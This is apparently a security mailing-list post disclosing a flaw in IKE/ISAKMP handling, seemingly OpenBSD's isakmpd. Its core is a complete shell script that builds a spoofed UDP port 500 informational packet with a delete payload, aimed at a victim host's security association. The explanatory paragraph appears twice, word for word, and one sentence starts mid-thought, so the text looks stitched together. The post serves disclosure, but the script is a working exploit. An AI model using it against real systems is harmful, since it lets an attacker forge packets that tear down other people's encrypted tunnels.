"Let him who have understanding reckon the" nonsense of this packet:
It's a message in an informational exchange with responder cookie and
message ID zero containing a hash payload of effective length zero, a SA
and a delete payload. That's an ambitious candidate for the Museum of
Broken Packets ;-).
in my last posting. A slightly modified attack still succeeds:
attacker# cat we_have_been_auditing_since_the_summer_of_1996¹
#!/bin/sh
if [ ! $# -eq 3 ]; then
echo "usage: $0 fake_src victim spi";
exit;
fi
src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
dnet hex $cky_i "\x00\x00\x00\x00\x00\x00\x00\x00" "\x08\x10\x05\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x5c" "\x01\x00\x00\x04" "\x0c\x00\x00\x2c" "\x00\x00\x00\x01" "\x00\x00\x00\x01" "\x00\x00\x00\x20" "\x01\x01\x00\x01" "\x00\x00\x00\x18" "\x00\x01\x00\x00" "\x80\x01\x00\x05" "\x80\x02\x00\x02" "\x80\x03\x00\x01" "\x80\x04\x00\x02" "\x00\x00\x00\x10" "\x00\x00\x00\x01" "\x03\x04\x00\x01" $spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send
"Let him who have understanding reckon the" nonsense of this packet:
It's a message in an informational exchange with responder cookie and
message ID zero containing a hash payload of effective length zero, a SA
and a delete payload. That's an ambitious candidate for the Museum of
Broken Packets ;-).
Thomas Walpuski
1 - http://openbsd.org/security.html#process
[ reply ]